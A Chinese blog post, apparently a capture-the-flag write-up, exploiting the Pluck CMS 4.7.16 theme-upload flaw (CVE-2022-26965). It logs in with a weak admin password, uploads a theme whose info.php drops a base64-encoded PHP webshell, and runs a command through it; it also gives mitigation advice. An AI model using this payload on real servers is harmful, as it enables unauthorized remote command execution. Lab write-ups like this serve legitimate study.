当前位置: 首页 > news >正文

利用cms主题构造木马(CVE-2022-26965)

简介

CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞

攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

过程

1.打开环境,查看源码,发现login.php

2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

3.找到上传cms主题界面

4.去github下载相对应的版本主题,随便下载一个就行

https://github.com/billcreswell/redline-theme

5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

<?phpfile_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));?>

解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

6.修改好的文件进行上传

文件上传成功。

7.连接

http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

成功。

解决方案

这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

http://www.lryc.cn/news/171874.html

相关文章:

  • 【MTK】【WFD】手机投屏到投影仪不显示画面
  • 多输入多输出 | MATLAB实现PSO-LSSVM粒子群优化最小二乘支持向量机多输入多输出
  • scrapyd-完整细节
  • 【iOS逆向与安全】插件开发之某音App直播间自动发666
  • AI Studio星河社区生产力实践:基于文心一言快速搭建知识库问答
  • http1和http2的主要区别
  • 一文了解水雨情在线监测站的优势
  • windows11中安装curl
  • 小谈设计模式(5)—开放封闭原则
  • 计算机视觉与深度学习-全连接神经网络-训练过程-欠拟合、过拟合和Dropout- [北邮鲁鹏]
  • SwiftUI Swift iOS iPadOS 实现更改 App 图标
  • Java————List
  • uniapp 触底加载
  • 大模型赛道如何实现华丽的弯道超车
  • CAN总线物理层
  • 中兴面试-Java开发
  • 浅谈 React 与 Vue 更新机制的差异
  • Delft3D水动力与泥沙运动模拟实践技术应用
  • Linux 本地Yearning SQL 审核平台远程访问
  • Redis集群(Cluster)
  • Scapy 解析 pcap 文件从HTTP流量中提取图片
  • 难得有个冷静的程序员发言了:纯编码开发实施的项目,失败的案例也有很多
  • Leetcode.146 LRU 缓存
  • 科技资讯|Canalys发布全球可穿戴腕带设备报告,智能可穿戴增长将持续
  • 使用https接口,无法调通接口响应不安全
  • uniapp开发h5,解决项目启动时,Network: unavailable问题
  • 9.17 校招 实习 内推 面经
  • 【Python小项目之Tkinter应用】随机点名/抽奖工具大优化:新增查看历史记录窗口!语音播报功能!修复预览文件按钮等之前版本的bug!
  • 数据结构与算法:排序算法(1)
  • NotePad++ 在行前/行后添加特殊字符内容方法